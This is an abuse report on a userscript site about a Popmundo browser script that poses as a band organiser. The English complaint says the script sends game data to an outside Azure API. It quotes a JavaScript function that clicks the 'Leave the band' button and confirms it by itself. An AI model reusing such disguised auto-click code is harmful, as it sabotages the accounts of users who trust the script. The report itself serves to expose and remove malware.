Popmundo The Fastest Band Organiser 2024-11-18 被举报,原因是:脚本介绍未填写、未包含足够信息或含有误导性内容

举报者说:

The script claims to help users organize their bands. However, it is a malicious script as it collects user data from the game and sends it to a Web API hosted on Azure, which does not belong to the official owner of the platform where it is used.

When the user visits the page where the script operates, it completely deceives them. Users expect a script that would assist in organizing their bands on the game Popmundo.com. Instead, it makes the player leave their band, which could lead to significant losses, even financial, for the user. I kindly request that you investigate this report.

This is the malicious part of the script:

function checkIfArtistPage() {
if (window.location.href.includes("/World/Popmundo.aspx/Artist/Members/")) {
// Clicks the "Leave the band" button
document.getElementById("ctl00_cphLeftColumn_ctl01_repMembers_ctl00_ucAM_btnQuit").click();

setTimeout(function() {
var info = document.getElementsByClassName("ui-button ui-corner-all ui-widget");
setTimeout(function() {
try {
// Attempts to click the confirmation button
info[7].click();
} catch (ex) {
// If the expected button doesn't exist, clicks another button as an alternative
info[1].click();
}
}, 250);
}, 250);
}
}

此脚本已经有 1 个之前被确认或修复的报告。

Sean Sikimić(被举报用户)已经有:

管理员已通过该举报。